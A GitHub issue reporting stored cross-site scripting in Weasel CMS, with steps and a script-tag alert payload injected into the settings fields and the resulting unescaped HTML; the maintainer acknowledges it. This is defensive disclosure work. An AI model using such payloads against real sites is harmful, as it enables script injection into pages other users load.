Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There have XSS vulnerability that can excute javascript #5

Closed
SkyZh47 opened this issue Jul 31, 2018 · 1 comment
Closed

There have XSS vulnerability that can excute javascript #5

SkyZh47 opened this issue Jul 31, 2018 · 1 comment

Comments

@SkyZh47
Copy link

SkyZh47 commented Jul 31, 2018

There are 4 XSS vulnerabilities
loading index.php
sign in and select "SETTINGS",
Insert the payload "'"()/ ><ScRiPt >alert(0)</ScRiPt>//" in the Site Language/Site Title/Site Description/Site Keywords and submit.

open index.php
line 376

<section class="column-one-third sidebar">
--
  | <h2><i class="fa fa-cog fa-fw"></i> Settings</h2>
  | <form method="POST" action="/cms/weasel/index.php">
  |  
  | <p>
  | <label for="site-language">
  | <span><i class="fa fa-globe fa-fw"></i> Site Language <small>( 2 letter i.e: ES, EN )</small></span>
  | <input type="text" name="site-language" id="site-language" value="'"()/ ><ScRiPt >alert(0)</ScRiPt>//" />
  | </label>
  | </p>
  | <p>
  | <label for="site-title">
  | <span><i class="fa fa-font fa-fw"></i> Site Title</span>
  | <input type="text" name="site-title" id="site-title" value="Weasel CMS" />
  | </label>
  | </p>
  | <p>
  | <label for="site-description">
  | <span><i class="fa fa-align-left fa-fw"></i> Site Description</span>
  | <input type="text" name="site-description" id="site-description" value="Open Source, very simple and lightweight flat file Content Management System written in PHP and built specifically for small websites." />
  | </label>
  | </p>
  | <p>
  | <label for="site-keywords">
  | <span><i class="fa fa-tags fa-fw"></i> Site Keywords <small>( Comma separated values )</small></span>
  | <input type="text" name="site-keywords" id="site-keywords" value="Weasel, WeaselCMS, PHP, CMS, Simple, lightweight, small, easy, Minimal" />
  | </label>
  | </p>
  | <p>
  | <label for="site-theme">
  | <span><i class="fa fa-paint-brush fa-fw"></i> Theme</span>
  | <select name="site-theme" id="site-theme">
  | <option value="weasel">weasel</option><option value="weasel-dark" selected=selected>weasel-dark</option>						 	</select>
  | </label>
  | </p>
  | <p>
  | <input type="submit" name="settings-submit" id="settings-submit" class="button-main" value="Save Settings" />
  | </p>
  | </form>
  | </section>

@alterebro
Copy link
Owner

Thanks for reporting this @SkyZhang47

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants